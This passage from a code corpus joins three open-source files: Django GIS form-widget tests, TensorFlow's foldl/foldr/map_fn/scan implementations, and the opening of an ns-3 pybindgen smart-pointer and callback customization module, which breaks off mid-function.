'polygon': GEOSGeometry("SRID=4326;POLYGON("
"(-1.669921875 6.240234375,"
"-3.8671875 -0.615234375,"
"5.9765625 -3.955078125,"
"18.193359375 3.955078125,"
"9.84375 9.4921875,"
"-1.669921875 6.240234375))"),
'multipolygon': GEOSGeometry("SRID=4326;MULTIPOLYGON("
"((-17.578125 13.095703125,"
"-17.2265625 10.8984375,"
"-13.974609375 10.1953125,"
"-13.359375 12.744140625,"
"-15.732421875 13.7109375,"
"-17.578125 13.095703125)),"
"((-8.525390625 5.537109375,"
"-8.876953125 2.548828125,"
"-5.888671875 1.93359375,"
"-5.09765625 4.21875,"
"-6.064453125 6.240234375,"
"-8.525390625 5.537109375)))"),
'geometrycollection': GEOSGeometry("SRID=4326;GEOMETRYCOLLECTION("
"POINT(5.625 -0.263671875),"
"POINT(6.767578125 -3.603515625),"
"POINT(8.525390625 0.087890625),"
"POINT(8.0859375 -2.13134765625),"
"LINESTRING("
"6.273193359375 -1.175537109375,"
"5.77880859375 -1.812744140625,"
"7.27294921875 -2.230224609375,"
"7.657470703125 -1.25244140625))"),
}
def assertMapWidget(self, form_instance):
"""
Make sure the MapWidget js is passed in the form media and a MapWidget
is actually created
"""
self.assertTrue(form_instance.is_valid())
rendered = form_instance.as_p()
self.assertIn('new MapWidget(options);', rendered)
self.assertIn('gis/js/OLMapWidget.js', str(form_instance.media))
def assertTextarea(self, geom, rendered):
"""Makes sure the wkt and a textarea are in the content"""
self.assertIn('<textarea ', rendered)
self.assertIn('required', rendered)
self.assertIn(geom.wkt, rendered)
def test_pointfield(self):
class PointForm(forms.Form):
p = forms.PointField()
geom = self.geometries['point']
form = PointForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PointForm().is_valid())
invalid = PointForm(data={'p': 'some invalid geom'})
self.assertFalse(invalid.is_valid())
self.assertIn('Invalid geometry value', str(invalid.errors))
for invalid in [geo for key, geo in self.geometries.items() if key != 'point']:
self.assertFalse(PointForm(data={'p': invalid.wkt}).is_valid())
def test_multipointfield(self):
class PointForm(forms.Form):
p = forms.MultiPointField()
geom = self.geometries['multipoint']
form = PointForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PointForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multipoint']:
self.assertFalse(PointForm(data={'p': invalid.wkt}).is_valid())
def test_linestringfield(self):
class LineStringForm(forms.Form):
l = forms.LineStringField()
geom = self.geometries['linestring']
form = LineStringForm(data={'l': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(LineStringForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'linestring']:
self.assertFalse(LineStringForm(data={'p': invalid.wkt}).is_valid())
def test_multilinestringfield(self):
class LineStringForm(forms.Form):
l = forms.MultiLineStringField()
geom = self.geometries['multilinestring']
form = LineStringForm(data={'l': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(LineStringForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multilinestring']:
self.assertFalse(LineStringForm(data={'p': invalid.wkt}).is_valid())
def test_polygonfield(self):
class PolygonForm(forms.Form):
p = forms.PolygonField()
geom = self.geometries['polygon']
form = PolygonForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PolygonForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'polygon']:
self.assertFalse(PolygonForm(data={'p': invalid.wkt}).is_valid())
def test_multipolygonfield(self):
class PolygonForm(forms.Form):
p = forms.MultiPolygonField()
geom = self.geometries['multipolygon']
form = PolygonForm(data={'p': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(PolygonForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'multipolygon']:
self.assertFalse(PolygonForm(data={'p': invalid.wkt}).is_valid())
def test_geometrycollectionfield(self):
class GeometryForm(forms.Form):
g = forms.GeometryCollectionField()
geom = self.geometries['geometrycollection']
form = GeometryForm(data={'g': geom})
self.assertTextarea(geom, form.as_p())
self.assertMapWidget(form)
self.assertFalse(GeometryForm().is_valid())
for invalid in [geo for key, geo in self.geometries.items() if key != 'geometrycollection']:
self.assertFalse(GeometryForm(data={'g': invalid.wkt}).is_valid())
@skipUnless(HAS_GDAL, "OSMWidgetTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class OSMWidgetTest(SimpleTestCase):
def setUp(self):
self.geometries = {
'point': GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)"),
}
def test_osm_widget(self):
class PointForm(forms.Form):
p = forms.PointField(widget=forms.OSMWidget)
geom = self.geometries['point']
form = PointForm(data={'p': geom})
rendered = form.as_p()
self.assertIn("OpenStreetMap (Mapnik)", rendered)
self.assertIn("id: 'id_p',", rendered)
def test_default_lat_lon(self):
class PointForm(forms.Form):
p = forms.PointField(
widget=forms.OSMWidget(attrs={
'default_lon': 20, 'default_lat': 30
}),
)
form = PointForm()
rendered = form.as_p()
self.assertIn("options['default_lon'] = 20;", rendered)
self.assertIn("options['default_lat'] = 30;", rendered)
if forms.OSMWidget.default_lon != 20:
self.assertNotIn(
"options['default_lon'] = %d;" % forms.OSMWidget.default_lon,
rendered)
if forms.OSMWidget.default_lat != 30:
self.assertNotIn(
"options['default_lat'] = %d;" % forms.OSMWidget.default_lat,
rendered)
@skipUnless(HAS_GDAL, "CustomGeometryWidgetTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class CustomGeometryWidgetTest(SimpleTestCase):
def test_custom_serialization_widget(self):
class CustomGeometryWidget(forms.BaseGeometryWidget):
template_name = 'gis/openlayers.html'
deserialize_called = 0
def serialize(self, value):
return value.json if value else ''
def deserialize(self, value):
self.deserialize_called += 1
return GEOSGeometry(value)
class PointForm(forms.Form):
p = forms.PointField(widget=CustomGeometryWidget)
point = GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)")
form = PointForm(data={'p': point})
self.assertIn(escape(point.json), form.as_p())
CustomGeometryWidget.called = 0
widget = form.fields['p'].widget
# Force deserialize use due to a string value
self.assertIn(escape(point.json), widget.render('p', point.json))
self.assertEqual(widget.deserialize_called, 1)
form = PointForm(data={'p': point.json})
self.assertTrue(form.is_valid())
# Ensure that resulting geometry has srid set
self.assertEqual(form.cleaned_data['p'].srid, 4326)
| bsd-3-clause |
nightjean/Deep-Learning | tensorflow/python/ops/functional_ops.py | 74 | 23664 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Functional operations.
See the @{$python/functional_ops} guide.
@@map_fn
@@foldl
@@foldr
@@scan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_functional_ops import *
# pylint: enable=wildcard-import
# pylint: disable=unused-import
from tensorflow.python.ops.gen_functional_ops import _symbolic_gradient
# pylint: enable=unused-import
from tensorflow.python.util import nest
# TODO(yuanbyu, mrry): Handle stride to support sliding windows.
def foldl(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, name=None):
"""foldl on the list of tensors unpacked from `elems` on dimension 0.
This foldl operator repeatedly applies the callable `fn` to a sequence
of elements from first to last. The elements are made of the tensors
unpacked from `elems` on dimension 0. The callable fn takes two tensors as
arguments. The first argument is the accumulated value computed from the
preceding invocation of fn. If `initializer` is None, `elems` must contain
at least one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
  of the result tensor is `fn(initializer, values[0]).shape`.
Args:
fn: The callable to be performed.
elems: A tensor to be unpacked on dimension 0.
initializer: (optional) The initial value for the accumulator.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor resulting from applying `fn` consecutively to the list of tensors
unpacked from `elems`, from first to last.
Raises:
TypeError: if `fn` is not callable.
Example:
```python
elems = [1, 2, 3, 4, 5, 6]
sum = foldl(lambda a, x: a + x, elems)
# sum == 21
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
with ops.name_scope(name, "foldl", [elems]):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems = ops.convert_to_tensor(elems, name="elems")
n = array_ops.shape(elems)[0]
elems_ta = tensor_array_ops.TensorArray(dtype=elems.dtype, size=n,
dynamic_size=False,
infer_shape=True)
elems_ta = elems_ta.unstack(elems)
if initializer is None:
a = elems_ta.read(0)
i = constant_op.constant(1)
else:
a = ops.convert_to_tensor(initializer)
i = constant_op.constant(0)
def compute(i, a):
a = fn(a, elems_ta.read(i))
return [i + 1, a]
_, r_a = control_flow_ops.while_loop(
lambda i, a: i < n, compute, [i, a],
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return r_a
def foldr(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, name=None):
"""foldr on the list of tensors unpacked from `elems` on dimension 0.
This foldr operator repeatedly applies the callable `fn` to a sequence
of elements from last to first. The elements are made of the tensors
unpacked from `elems`. The callable fn takes two tensors as arguments.
The first argument is the accumulated value computed from the preceding
invocation of fn. If `initializer` is None, `elems` must contain at least
one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `fn(initializer, values[0]).shape`.
Args:
fn: The callable to be performed.
elems: A tensor that is unpacked into a sequence of tensors to apply `fn`.
initializer: (optional) The initial value for the accumulator.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor resulting from applying `fn` consecutively to the list of tensors
unpacked from `elems`, from last to first.
Raises:
TypeError: if `fn` is not callable.
Example:
```python
elems = [1, 2, 3, 4, 5, 6]
sum = foldr(lambda a, x: a + x, elems)
# sum == 21
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
with ops.name_scope(name, "foldr", [elems]):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems = ops.convert_to_tensor(elems, name="elems")
n = array_ops.shape(elems)[0]
elems_ta = tensor_array_ops.TensorArray(dtype=elems.dtype, size=n,
dynamic_size=False,
infer_shape=True)
elems_ta = elems_ta.unstack(elems)
if initializer is None:
i = n - 1
a = elems_ta.read(i)
else:
i = n
a = ops.convert_to_tensor(initializer)
def compute(i, a):
i -= 1
a = fn(a, elems_ta.read(i))
return [i, a]
_, r_a = control_flow_ops.while_loop(
lambda i, a: i > 0, compute, [i, a],
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return r_a
def map_fn(fn, elems, dtype=None, parallel_iterations=10, back_prop=True,
swap_memory=False, infer_shape=True, name=None):
"""map on the list of tensors unpacked from `elems` on dimension 0.
The simplest version of `map_fn` repeatedly applies the callable `fn` to a
sequence of elements from first to last. The elements are made of the
tensors unpacked from `elems`. `dtype` is the data type of the return
value of `fn`. Users must provide `dtype` if it is different from
the data type of `elems`.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `[values.shape[0]] + fn(values[0]).shape`.
This method also allows multi-arity `elems` and output of `fn`. If `elems`
is a (possibly nested) list or tuple of tensors, then each of these tensors
must have a matching first (unpack) dimension. The signature of `fn` may
match the structure of `elems`. That is, if `elems` is
`(t1, [t2, t3, [t4, t5]])`, then an appropriate signature for `fn` is:
`fn = lambda (t1, [t2, t3, [t4, t5]]):`.
Furthermore, `fn` may emit a different structure than its input. For example,
`fn` may look like: `fn = lambda t1: return (t1 + 1, t1 - 1)`. In this case,
the `dtype` parameter is not optional: `dtype` must be a type or (possibly
nested) tuple of types matching the output of `fn`.
To apply a functional operation to the nonzero elements of a SparseTensor
one of the following methods is recommended. First, if the function is
expressible as TensorFlow ops, use
```python
result = SparseTensor(input.indices, fn(input.values), input.dense_shape)
```
If, however, the function is not expressible as a TensorFlow op, then use
```python
result = SparseTensor(
input.indices, map_fn(fn, input.values), input.dense_shape)
```
instead.
Args:
fn: The callable to be performed. It accepts one argument, which will
have the same (possibly nested) structure as `elems`. Its output
must have the same structure as `dtype` if one is provided, otherwise
it must have the same structure as `elems`.
elems: A tensor or (possibly nested) sequence of tensors, each of which
will be unpacked along their first dimension. The nested sequence
of the resulting slices will be applied to `fn`.
dtype: (optional) The output type(s) of `fn`. If `fn` returns a structure
of Tensors differing from the structure of `elems`, then `dtype` is not
optional and must have the same structure as the output of `fn`.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
infer_shape: (optional) False disables tests for consistent output shapes.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor or (possibly nested) sequence of tensors. Each tensor packs the
results of applying `fn` to tensors unpacked from `elems` along the first
dimension, from first to last.
Raises:
TypeError: if `fn` is not callable or the structure of the output of
`fn` and `dtype` do not match, or if elems is a SparseTensor.
ValueError: if the lengths of the output of `fn` and `dtype` do not match.
Examples:
```python
elems = np.array([1, 2, 3, 4, 5, 6])
squares = map_fn(lambda x: x * x, elems)
# squares == [1, 4, 9, 16, 25, 36]
```
```python
elems = (np.array([1, 2, 3]), np.array([-1, 1, -1]))
alternate = map_fn(lambda x: x[0] * x[1], elems, dtype=tf.int64)
# alternate == [-1, 2, -3]
```
```python
elems = np.array([1, 2, 3])
alternates = map_fn(lambda x: (x, -x), elems, dtype=(tf.int64, tf.int64))
# alternates[0] == [1, 2, 3]
# alternates[1] == [-1, -2, -3]
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
if isinstance(elems, sparse_tensor.SparseTensor):
raise TypeError(
"To perform a map on the values of a sparse tensor use either "
" SparseTensor(input.indices, fn(input.values), input.dense_shape) or "
" SparseTensor(input.indices, map_fn(fn, input.values), "
"input.dense_shape)")
input_is_sequence = nest.is_sequence(elems)
input_flatten = lambda x: nest.flatten(x) if input_is_sequence else [x]
def input_pack(x):
return nest.pack_sequence_as(elems, x) if input_is_sequence else x[0]
if dtype is None:
output_is_sequence = input_is_sequence
output_flatten = input_flatten
output_pack = input_pack
else:
output_is_sequence = nest.is_sequence(dtype)
output_flatten = lambda x: nest.flatten(x) if output_is_sequence else [x]
def output_pack(x):
return (nest.pack_sequence_as(dtype, x)
if output_is_sequence else x[0])
elems_flat = input_flatten(elems)
with ops.name_scope(name, "map", elems_flat):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
elems_flat = [
ops.convert_to_tensor(elem, name="elem") for elem in elems_flat]
dtype = dtype or input_pack([elem.dtype for elem in elems_flat])
dtype_flat = output_flatten(dtype)
# Convert elems to tensor array.
n = array_ops.shape(elems_flat[0])[0]
# TensorArrays are always flat
elems_ta = [
tensor_array_ops.TensorArray(dtype=elem.dtype, size=n,
dynamic_size=False,
infer_shape=True)
for elem in elems_flat]
# Unpack elements
elems_ta = [
elem_ta.unstack(elem) for elem_ta, elem in zip(elems_ta, elems_flat)]
i = constant_op.constant(0)
accs_ta = [
tensor_array_ops.TensorArray(dtype=dt, size=n,
dynamic_size=False,
infer_shape=infer_shape)
for dt in dtype_flat]
def compute(i, tas):
"""The loop body of map_fn.
Args:
i: the loop counter
tas: the flat TensorArray accumulator list
Returns:
(i + 1, tas): the updated counter + updated TensorArrays
Raises:
TypeError: if dtype and packed_fn_values structure do not match
        ValueError: if dtype and packed_fn_values lengths do not match
"""
packed_values = input_pack([elem_ta.read(i) for elem_ta in elems_ta])
packed_fn_values = fn(packed_values)
nest.assert_same_structure(dtype or elems, packed_fn_values)
flat_fn_values = output_flatten(packed_fn_values)
tas = [ta.write(i, value) for (ta, value) in zip(tas, flat_fn_values)]
return (i + 1, tas)
_, r_a = control_flow_ops.while_loop(
lambda i, _: i < n, compute, (i, accs_ta),
parallel_iterations=parallel_iterations,
back_prop=back_prop,
swap_memory=swap_memory)
results_flat = [r.stack() for r in r_a]
n_static = elems_flat[0].get_shape().with_rank_at_least(1)[0]
for elem in elems_flat[1:]:
n_static.merge_with(elem.get_shape().with_rank_at_least(1)[0])
for r in results_flat:
r.set_shape(tensor_shape.TensorShape(n_static).concatenate(
r.get_shape()[1:]))
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return output_pack(results_flat)
def scan(fn, elems, initializer=None, parallel_iterations=10, back_prop=True,
swap_memory=False, infer_shape=True, name=None):
"""scan on the list of tensors unpacked from `elems` on dimension 0.
The simplest version of `scan` repeatedly applies the callable `fn` to a
sequence of elements from first to last. The elements are made of the tensors
unpacked from `elems` on dimension 0. The callable fn takes two tensors as
arguments. The first argument is the accumulated value computed from the
preceding invocation of fn. If `initializer` is None, `elems` must contain
at least one element, and its first element is used as the initializer.
Suppose that `elems` is unpacked into `values`, a list of tensors. The shape
of the result tensor is `[len(values)] + fn(initializer, values[0]).shape`.
This method also allows multi-arity `elems` and accumulator. If `elems`
is a (possibly nested) list or tuple of tensors, then each of these tensors
must have a matching first (unpack) dimension. The second argument of
`fn` must match the structure of `elems`.
If no `initializer` is provided, the output structure and dtypes of `fn`
are assumed to be the same as its input; and in this case, the first
argument of `fn` must match the structure of `elems`.
If an `initializer` is provided, then the output of `fn` must have the same
structure as `initializer`; and the first argument of `fn` must match
this structure.
For example, if `elems` is `(t1, [t2, t3])` and `initializer` is
`[i1, i2]` then an appropriate signature for `fn` in `python2` is:
`fn = lambda (acc_p1, acc_p2), (t1 [t2, t3]):` and `fn` must return a list,
`[acc_n1, acc_n2]`. An alternative correct signature for `fn`, and the
one that works in `python3`, is:
`fn = lambda a, t:`, where `a` and `t` correspond to the input tuples.
Args:
fn: The callable to be performed. It accepts two arguments. The first
will have the same structure as `initializer` if one is provided,
otherwise it will have the same structure as `elems`. The second
will have the same (possibly nested) structure as `elems`. Its output
must have the same structure as `initializer` if one is provided,
otherwise it must have the same structure as `elems`.
elems: A tensor or (possibly nested) sequence of tensors, each of which
will be unpacked along their first dimension. The nested sequence
of the resulting slices will be the first argument to `fn`.
initializer: (optional) A tensor or (possibly nested) sequence of tensors,
initial value for the accumulator, and the expected output type of `fn`.
parallel_iterations: (optional) The number of iterations allowed to run
in parallel.
back_prop: (optional) True enables support for back propagation.
swap_memory: (optional) True enables GPU-CPU memory swapping.
infer_shape: (optional) False disables tests for consistent output shapes.
name: (optional) Name prefix for the returned tensors.
Returns:
A tensor or (possibly nested) sequence of tensors. Each tensor packs the
results of applying `fn` to tensors unpacked from `elems` along the first
dimension, and the previous accumulator value(s), from first to last.
Raises:
TypeError: if `fn` is not callable or the structure of the output of
`fn` and `initializer` do not match.
ValueError: if the lengths of the output of `fn` and `initializer`
do not match.
Examples:
```python
elems = np.array([1, 2, 3, 4, 5, 6])
sum = scan(lambda a, x: a + x, elems)
# sum == [1, 3, 6, 10, 15, 21]
```
```python
elems = np.array([1, 2, 3, 4, 5, 6])
initializer = np.array(0)
sum_one = scan(
lambda a, x: x[0] - x[1] + a, (elems + 1, elems), initializer)
# sum_one == [1, 2, 3, 4, 5, 6]
```
```python
elems = np.array([1, 0, 0, 0, 0, 0])
initializer = (np.array(0), np.array(1))
fibonaccis = scan(lambda a, _: (a[1], a[0] + a[1]), elems, initializer)
# fibonaccis == ([1, 1, 2, 3, 5, 8], [1, 2, 3, 5, 8, 13])
```
"""
if not callable(fn):
raise TypeError("fn must be callable.")
input_is_sequence = nest.is_sequence(elems)
input_flatten = lambda x: nest.flatten(x) if input_is_sequence else [x]
def input_pack(x):
return nest.pack_sequence_as(elems, x) if input_is_sequence else x[0]
if initializer is None:
output_is_sequence = input_is_sequence
output_flatten = input_flatten
output_pack = input_pack
else:
output_is_sequence = nest.is_sequence(initializer)
output_flatten = lambda x: nest.flatten(x) if output_is_sequence else [x]
def output_pack(x):
return (nest.pack_sequence_as(initializer, x)
if output_is_sequence else x[0])
elems_flat = input_flatten(elems)
with ops.name_scope(name, "scan", elems_flat):
# Any get_variable calls in fn will cache the first call locally
# and not issue repeated network I/O requests for each iteration.
varscope = vs.get_variable_scope()
varscope_caching_device_was_none = False
if varscope.caching_device is None:
# TODO(ebrevdo): Change to using colocate_with here and in other methods.
varscope.set_caching_device(lambda op: op.device)
varscope_caching_device_was_none = True
# Convert elems to tensor array.
elems_flat = [
ops.convert_to_tensor(elem, name="elem") for elem in elems_flat]
n = array_ops.shape(elems_flat[0])[0]
# TensorArrays are always flat
elems_ta = [
tensor_array_ops.TensorArray(dtype=elem.dtype, size=n,
dynamic_size=False,
infer_shape=True)
for elem in elems_flat]
# Unpack elements
elems_ta = [
elem_ta.unstack(elem) for elem_ta, elem in zip(elems_ta, elems_flat)]
if initializer is None:
a_flat = [elem.read(0) for elem in elems_ta]
i = constant_op.constant(1)
else:
initializer_flat = output_flatten(initializer)
a_flat = [ops.convert_to_tensor(init) for init in initializer_flat]
i = constant_op.constant(0)
# Create a tensor array to store the intermediate values.
accs_ta = [
tensor_array_ops.TensorArray(dtype=init.dtype, size=n,
dynamic_size=False,
infer_shape=infer_shape)
for init in a_flat]
if initializer is None:
accs_ta = [acc_ta.write(0, a) for (acc_ta, a) in zip(accs_ta, a_flat)]
def compute(i, a_flat, tas):
"""The loop body of scan.
Args:
i: the loop counter.
a_flat: the accumulator value(s), flattened.
tas: the output accumulator TensorArray(s), flattened.
Returns:
[i + 1, a_flat, tas]: the updated counter + new accumulator values +
updated TensorArrays
Raises:
TypeError: if initializer and fn() output structure do not match
ValueError: if initializer and fn() output lengths do not match
"""
packed_elems = input_pack([elem_ta.read(i) for elem_ta in elems_ta])
packed_a = output_pack(a_flat)
a_out = fn(packed_a, packed_elems)
nest.assert_same_structure(
elems if initializer is None else initializer, a_out)
flat_a_out = output_flatten(a_out)
tas = [ta.write(i, value) for (ta, value) in zip(tas, flat_a_out)]
return (i + 1, flat_a_out, tas)
_, _, r_a = control_flow_ops.while_loop(
lambda i, _1, _2: i < n, compute, (i, a_flat, accs_ta),
parallel_iterations=parallel_iterations,
back_prop=back_prop, swap_memory=swap_memory)
results_flat = [r.stack() for r in r_a]
n_static = elems_flat[0].get_shape().with_rank_at_least(1)[0]
for elem in elems_flat[1:]:
n_static.merge_with(elem.get_shape().with_rank_at_least(1)[0])
for r in results_flat:
r.set_shape(tensor_shape.TensorShape(n_static).concatenate(
r.get_shape()[1:]))
if varscope_caching_device_was_none:
varscope.set_caching_device(None)
return output_pack(results_flat)
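# Rough Python analogue of the semantics implemented above (a sketch only; it
# ignores graph construction, nested structures and TensorArrays):
#
#   def scan_py(fn, elems, initializer=None):
#       acc = elems[0] if initializer is None else initializer
#       out = [acc] if initializer is None else []
#       for x in (elems[1:] if initializer is None else elems):
#           acc = fn(acc, x)
#           out.append(acc)
#       return out
#
#   scan_py(lambda a, x: a + x, [1, 2, 3, 4, 5, 6])  # [1, 3, 6, 10, 15, 21]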
| apache-2.0 |
tomhenderson/ns-3-dev-testing | bindings/python/ns3modulegen_core_customizations.py | 41 | 18881 | from __future__ import print_function
import sys
import re
from pybindgen.typehandlers import base as typehandlers
from pybindgen import ReturnValue, Parameter
from pybindgen.cppmethod import CustomCppMethodWrapper, CustomCppConstructorWrapper
from pybindgen.typehandlers.codesink import MemoryCodeSink
from pybindgen.typehandlers import ctypeparser
from pybindgen.typehandlers.base import ForwardWrapperBase
from pybindgen import cppclass
import warnings
from pybindgen.typehandlers.base import CodeGenerationError
class SmartPointerTransformation(typehandlers.TypeTransformation):
"""
This class provides a "type transformation" that tends to support
NS-3 smart pointers. Parameters such as "Ptr<Foo> foo" are
transformed into something like Parameter.new("Foo*", "foo",
transfer_ownership=False). Return values such as Ptr<Foo> are
transformed into ReturnValue.new("Foo*",
caller_owns_return=False). Since the underlying objects have
reference counting, PyBindGen does the right thing.
"""
def __init__(self):
super(SmartPointerTransformation, self).__init__()
self.rx = re.compile(r'(ns3::|::ns3::|)Ptr<([^>]+)>\s*$')
print("{0!r}".format(self), file=sys.stderr)
def _get_untransformed_type_traits(self, name):
m = self.rx.match(name)
is_const = False
if m is None:
print("{0!r} did not match".format(name), file=sys.stderr)
return None, False
else:
name1 = m.group(2).strip()
if name1.startswith('const '):
name1 = name1[len('const '):]
is_const = True
if name1.endswith(' const'):
name1 = name1[:-len(' const')]
is_const = True
new_name = name1+' *'
if new_name.startswith('::'):
new_name = new_name[2:]
return new_name, is_const
def get_untransformed_name(self, name):
new_name, dummy_is_const = self._get_untransformed_type_traits(name)
return new_name
def create_type_handler(self, type_handler, *args, **kwargs):
if issubclass(type_handler, Parameter):
kwargs['transfer_ownership'] = False
elif issubclass(type_handler, ReturnValue):
kwargs['caller_owns_return'] = False
else:
raise AssertionError
## fix the ctype, add ns3:: namespace
orig_ctype, is_const = self._get_untransformed_type_traits(args[0])
if is_const:
correct_ctype = 'ns3::Ptr< {0} const >'.format(orig_ctype[:-2])
else:
correct_ctype = 'ns3::Ptr< {0} >'.format(orig_ctype[:-2])
args = tuple([correct_ctype] + list(args[1:]))
handler = type_handler(*args, **kwargs)
handler.set_tranformation(self, orig_ctype)
return handler
def untransform(self, type_handler, declarations, code_block, expression):
return 'const_cast<%s> (ns3::PeekPointer (%s))' % (type_handler.untransformed_ctype, expression)
def transform(self, type_handler, declarations, code_block, expression):
assert type_handler.untransformed_ctype[-1] == '*'
return 'ns3::Ptr< %s > (%s)' % (type_handler.untransformed_ctype[:-1], expression)
## register the type transformation
transf = SmartPointerTransformation()
typehandlers.return_type_matcher.register_transformation(transf)
typehandlers.param_type_matcher.register_transformation(transf)
del transf
class CallbackImplProxyMethod(typehandlers.ReverseWrapperBase):
"""
Class that generates a proxy virtual method that calls a similarly named python method.
"""
def __init__(self, return_value, parameters):
super(CallbackImplProxyMethod, self).__init__(return_value, parameters)
def generate_python_call(self):
"""code to call the python method"""
build_params = self.build_params.get_parameters(force_tuple_creation=True)
if build_params[0][0] == '"':
build_params[0] = '(char *) ' + build_params[0]
args = self.before_call.declare_variable('PyObject*', 'args')
self.before_call.write_code('%s = Py_BuildValue(%s);'
% (args, ', '.join(build_params)))
self.before_call.add_cleanup_code('Py_DECREF(%s);' % args)
self.before_call.write_code('py_retval = PyObject_CallObject(m_callback, %s);' % args)
self.before_call.write_error_check('py_retval == NULL')
self.before_call.add_cleanup_code('Py_DECREF(py_retval);')
def register_callback_classes(out, callbacks):
for callback_impl_num, template_parameters in enumerate(callbacks):
cls_name = "ns3::Callback< %s >" % ', '.join(template_parameters)
#print >> sys.stderr, "***** trying to register callback: %r" % cls_name
class_name = "PythonCallbackImpl%i" % callback_impl_num
class PythonCallbackParameter(Parameter):
"Class handlers"
CTYPES = [cls_name]
print("***** registering callback handler: %r (%r)" % (ctypeparser.normalize_type_string(cls_name), cls_name), file=sys.stderr)
DIRECTIONS = [Parameter.DIRECTION_IN]
PYTHON_CALLBACK_IMPL_NAME = class_name
TEMPLATE_ARGS = template_parameters
DISABLED = False
def convert_python_to_c(self, wrapper):
"parses python args to get C++ value"
assert isinstance(wrapper, typehandlers.ForwardWrapperBase)
if self.DISABLED:
raise CodeGenerationError("wrapper could not be generated")
if self.default_value is None:
py_callback = wrapper.declarations.declare_variable('PyObject*', self.name)
wrapper.parse_params.add_parameter('O', ['&'+py_callback], self.name)
wrapper.before_call.write_error_check(
'!PyCallable_Check(%s)' % py_callback,
'PyErr_SetString(PyExc_TypeError, "parameter \'%s\' must be callable");' % self.name)
callback_impl = wrapper.declarations.declare_variable(
'ns3::Ptr<%s>' % self.PYTHON_CALLBACK_IMPL_NAME,
'%s_cb_impl' % self.name)
wrapper.before_call.write_code("%s = ns3::Create<%s> (%s);"
% (callback_impl, self.PYTHON_CALLBACK_IMPL_NAME, py_callback))
wrapper.call_params.append(
'ns3::Callback<%s> (%s)' % (', '.join(self.TEMPLATE_ARGS), callback_impl))
else:
py_callback = wrapper.declarations.declare_variable('PyObject*', self.name, 'NULL')
wrapper.parse_params.add_parameter('O', ['&'+py_callback], self.name, optional=True)
value = wrapper.declarations.declare_variable(
